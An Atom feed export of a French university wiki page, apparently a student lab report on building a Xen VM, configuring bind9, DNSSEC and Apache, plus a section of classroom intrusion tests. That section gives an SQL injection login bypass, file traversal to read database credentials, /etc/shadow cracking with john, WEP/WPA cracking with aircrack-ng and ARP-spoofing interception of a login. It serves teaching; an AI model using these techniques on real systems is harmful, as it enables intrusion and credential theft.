<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Jnduwamu</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Jnduwamu"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Jnduwamu"/>
		<updated>2026-05-13T00:24:15Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54656</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54656"/>
				<updated>2020-12-14T18:42:31Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Configuration IPv6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
 892    27.057577298    172.26.145.70    193.48.57.233    HTTP    1118    GET http://fabricarium-old.polytech-lille.fr/ HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 987    38.734920206    172.26.145.70    193.48.57.233    HTTP    1383    POST http://fabricarium-old.polytech-lille.fr/users/sign_in.json HTTP/1.1  (application/json)&lt;br /&gt;
&lt;br /&gt;
 995    39.815022272    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 1523    99.814090449    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 Frame 987: 1383 bytes on wire (11064 bits), 1383 bytes captured (11064 bits) on interface 0&lt;br /&gt;
 Ethernet II, Src: IntelCor_8f:f7:d3 (00:15:17:8f:f7:d3), Dst: HewlettP_01:ed:ce (5c:b9:01:01:ed:ce)&lt;br /&gt;
 Internet Protocol Version 4, Src: 172.26.145.70, Dst: 193.48.57.233&lt;br /&gt;
 Transmission Control Protocol, Src Port: 53876, Dst Port: 3128, Seq: 14532, Ack: 11925, Len: 1317&lt;br /&gt;
 Hypertext Transfer Protocol&lt;br /&gt;
 JavaScript Object Notation: application/json&lt;br /&gt;
    Object&lt;br /&gt;
        Member Key: user&lt;br /&gt;
            Object&lt;br /&gt;
                Member Key: email&lt;br /&gt;
                    String value: mail@mail.com&lt;br /&gt;
                    Key: email&lt;br /&gt;
                Member Key: password&lt;br /&gt;
                    String value: motdepasse&lt;br /&gt;
                    Key: password&lt;br /&gt;
            Key: user&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12:&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications, le site est up et la page par défaut d'apache2 avec une petite modification pour confirmer le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12&lt;br /&gt;
&lt;br /&gt;
Plusieurs modifications ont été effectuées sur le ficiher db.morillon.website:&lt;br /&gt;
&lt;br /&gt;
Modification des A record, serveur mail et web, passage au serial contenant date de modification:&lt;br /&gt;
&lt;br /&gt;
    ;BIND data file for local loopback interface&lt;br /&gt;
    ;&lt;br /&gt;
    $TTL    86400&lt;br /&gt;
    @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                     2020120705         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                          86400 );       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
   @        IN      NS      ns1.morillon.website.&lt;br /&gt;
   @        IN      NS      ns6.gandi.net.&lt;br /&gt;
   @        IN	    MX	    100 mail&lt;br /&gt;
   mail	    IN	    A	    193.48.57.183&lt;br /&gt;
   ns1	    IN	    A       193.48.57.183&lt;br /&gt;
   www	    IN	    CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
mail passé en A car warning de bind9 alertant l'illégalité d'un mail en CNAME&lt;br /&gt;
&lt;br /&gt;
Ajout d'une zone inverse dans le fichier db.193: &lt;br /&gt;
&lt;br /&gt;
   ; BIND reverse data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL	604800&lt;br /&gt;
   @	IN	SOA	ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
        2020120703		; Serial&lt;br /&gt;
            604800		; Refresh&lt;br /&gt;
             86400		; Retry&lt;br /&gt;
           2419200		; Expire&lt;br /&gt;
            604800 );	; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @	IN	NS	ns1.&lt;br /&gt;
   183	IN	PTR	ns1.morillon.website.&lt;br /&gt;
   183	IN 	PTR	mail.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Avec une entrée pour chaque A record&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.options :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    	listen-on-v6 { any; };&lt;br /&gt;
        listen-on { any; };&lt;br /&gt;
        allow-recursion {127.0.0.1; 193.48.57.183; 217.70.177.40;};&lt;br /&gt;
        allow-query-cache {127.0.0.1; 193.48.57.183;};&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout de l'IP publique et du dns gandi pour les récursions, query-cache réduit pour empêcher usurpation&lt;br /&gt;
Des request denied dans le log confirme le bon fonctionnement :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    Dec  9 08:42:51 morillon named[1923]: client @0x7f1a44056fa0 88.80.186.137#43549 (193-48-57-183-5fd02192.spiderprobe.com): query (cache) \&lt;br /&gt;
    '193-48-57-183-5fd02192.spiderprobe.com/A/IN' denied&lt;br /&gt;
    Dec  9 11:07:56 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local :&lt;br /&gt;
&lt;br /&gt;
   ...&lt;br /&gt;
   zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
   };&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
Pour zone de recherche inverse&lt;br /&gt;
&lt;br /&gt;
Modification du fichier de lancement /etc/default/bind9 pour un mode IPv4 pour l'instant:&lt;br /&gt;
    &lt;br /&gt;
    ...&lt;br /&gt;
    OPTIONS=&amp;quot; -4 -u bind&amp;quot;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
====Configuration du DNSSEC====&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec_morillon.png|right]]&lt;br /&gt;
&lt;br /&gt;
Pour configurer bind9 avec dnssec, nous générons d'abord les clés KSK et ZSK:&lt;br /&gt;
&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE morillon.website&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b -b 1024 -n ZONE morillon.website&lt;br /&gt;
&lt;br /&gt;
Pour plus de clarté :&lt;br /&gt;
    mv Kmorillon.website.+005+59473.key morillon.website-ksk.key&lt;br /&gt;
    mv Kmorillon.website.+005+59473.private morillon.website-ksk.private&lt;br /&gt;
&lt;br /&gt;
    mv Kmorillon.website.+005+52512.key morillon.website-zsk.key&lt;br /&gt;
    mv Kmorillon.website.+005+52512.private morillon.website-zsk.private&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier named.conf.options des options propres au DNSSEC:&lt;br /&gt;
    ...&lt;br /&gt;
    dnssec-enable yes;&lt;br /&gt;
    dnssec-validation yes;&lt;br /&gt;
    dnssec-lookaside yes;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier de zone db.morillon.website des clés: &lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-ksk.key&lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-zsk.key&lt;br /&gt;
&lt;br /&gt;
Incrémentation du revision code&lt;br /&gt;
&lt;br /&gt;
Signature du fichier de zone par l'utilitaire dnssec :&lt;br /&gt;
    dnssec-signzone -o morillon.website -k morillon.website-ksk db.morillon.website morillon.website-zsk&lt;br /&gt;
&lt;br /&gt;
''Nous avons eu un problème lors de la signature du fichier de zone, pour cela nous avons dû rajouter le timeout dans les fichiers de clés :&lt;br /&gt;
    morillon.website. '''3600''' IN DNSKEY 257 3 5 AwEAAfVX0ANdFDm...&lt;br /&gt;
&lt;br /&gt;
Apparemment à cause de l'option -L absente lors de la création des clés.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local pour changement du fichier de zone à charger :&lt;br /&gt;
    ... &lt;br /&gt;
    //file &amp;quot;/etc/bind/db.morillon.website&amp;quot;;&lt;br /&gt;
    file &amp;quot;/etc/bind/db.morillon.website.signed&amp;quot;;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Redémarrage du serveur bind9 avec la nouvelle configuration :&lt;br /&gt;
    service reload bind9&lt;br /&gt;
&lt;br /&gt;
Puis partage des clés KSK et ZSK avec gandi.net dans la zone registrar (utilisation d'un algorithme RSA/SHA1 (5))&lt;br /&gt;
&lt;br /&gt;
Lors d'un host -t any, nous obtenons :&lt;br /&gt;
    morillon.website has RRSIG record NSEC 5 2 86400 20210113121019 20201214121019 52512 morillon.website. nIhQAoZ568EQQ9eOl5H11UqnE49RW62604sey8RqnpVV1GWO4Rp5fkX4 7aOmVVljXVpnFvBfcfVYI430VHGKJUjUwSgSQSFFrLsKqETAp2PZFosH qEX1ml7c6U5SGpWdlkMtisLCxYfYn8/r2R25MZtrZsIsW543Zx6kXSzP 4CI=&lt;br /&gt;
    morillon.website has NSEC record mail.morillon.website. NS SOA MX RRSIG NSEC DNSKEY&lt;br /&gt;
    morillon.website has RRSIG record MX 5 2 86400 20210113121019 20201214121019 52512 morillon.website. GYKvgQe+6dfZkrevA3TXyJS82o77qWlRl/pNsE0I41Ku7FT1RgifPDll kXnqRl9G70iT4cRB9dNa/F+7RTcvY276in44lMkAzRlMWARG8+hYBhhq 5nvNN4kJpDZ7dKIpTc/wMu7SGiMZYKKrJOeK/pdarxI4ZHyqhDMiCW/X 9hE=&lt;br /&gt;
    morillon.website mail is handled by 100 mail.morillon.website.&lt;br /&gt;
    morillon.website has RRSIG record NS 5 2 86400 20210113121019 20201214121019 52512 morillon.website. RuAS5LH4UEmd+FIjzD522vwJcrGYlNuUuZYsDAFy0JiMGuOse5EKAWOi 01NWxfLAPGCDlj9Dj4QfyxSA+GhIJPEU25kcR44Nv/LQn1FsJZlQT8XM QkUnAXSlchrIlKg+XaSCTGjjfB1rE5Oba7PUwYgQ5CC7C7etvXegp2QV Ju0=&lt;br /&gt;
    morillon.website has RRSIG record SOA 5 2 86400 20210113121019 20201214121019 52512 morillon.website. i+0smnpl1ASGvURvV3lL/BuL6Zw/s3yjslMRUIKbOkE4tM/zgqF5RrTb gHOkj3PcZSSaO31O3vKUz6S0iPo/YWQvdaF0aHDcyvLQgCLiP6vpNwF+ mwOO821Jto39AM+3cuWCsytKECqKH4LoDMxkw/MUi6DJe40eAD8HEf2P 8iQ=&lt;br /&gt;
    morillon.website has SOA record ns1.morillon.website. postmaster.morillon.website. 2020120706 604800 86400 2419200 86400&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 52512 morillon.website. VGQyJDSf38xOBJymFK/DYLO/UYPEoIspsqZpPPnX+nPjUdR5Tw3tILPT 5AfZWAChlgQ8AnfLzxum/znpKI66EbeqTHvg1J/FjMBvlsyyLjwqjn6w u7JzquC/fbpq4HsskLFgpl1Z1zNuQAJB9xBGOJR8BpCHBRc8ubp1tUzy I2k=&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 59473 morillon.website. Tz3BwfoPt+loiqbWuQnbDdl57L6eXQ+dv+ZvXzcrvCSTXy/UKNRjs39d t6j6krwo4eZk6blXGgDEm93D67AmkQHmus9NYL9VgR0eG/NPHIodozzq aai4jXKwcOnk8O3d/nObyOERvGbnD9znUVGtgiUDCcY7UaXBogewFyCR Zxq69+FdFvmIXwriHHRRiaN/Bf4r/+djB46AcZEpbtvq1475BfJ6qYe/ VxW5odv1wcr9k8Sy/27LMbaHzdX9OWqdYLge3vfBRa8VMW+R57tx+M0p mtmOExUgc3mmnsVLP89L2M85MMTcbaup1RJIG4L33CaYEl9hOiaki4j8 CW5GHg==&lt;br /&gt;
    morillon.website has DNSKEY record 257 3 5 AwEAAfVX0ANdFDmDRKIBUMhso53F9LjZnc3lKHwHZHe3xiyLnFC+rQyc CQH+xg5g0UvDSLtoTFRtMiA4AyY6d8fywjmNFVluu64iDWyZkIVdiZLm XkfDdt4lz2+rxE1IkncbCYKkOk5cwkXYtxR/z/leOyZPX4i8Q1fhMfJG jUzNnZ1dATz0WGTb5qoGU9mEzVOH1WH4SkHc+acXkfBn6MtgR/DNJKDw 5huO3LMuA/ZyfwZU7lHhID97MMdpIwTIjd/nJLCjNY6rUP4OzZka7VjQ n/lOZ2UGMjOn+4QQqKDvmLohUOBsNFyY7PnSvsV9j5riNEZfuBx863QN 0PSBfK9cA4M=&lt;br /&gt;
    morillon.website has DNSKEY record 256 3 5 AwEAAaZUpNecSfAJ70amN3b4lcgpOAKXwbeJRogxxJEaqoSa0meQm6PY ZHAJFkxMMi78X+qVQeZr206VozCjPhysAWK6G45h/yY73Xzw1s0KzLwf L6FOhcn7KWzf2CIm6RfH5hwRLyuDriAaVVdKPxN/CkW9LIXRzm5LWSdz hqsZrhsz&lt;br /&gt;
    morillon.website name server ns6.gandi.net.&lt;br /&gt;
    morillon.website name server ns1.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Cela fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
===Apache2 et sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
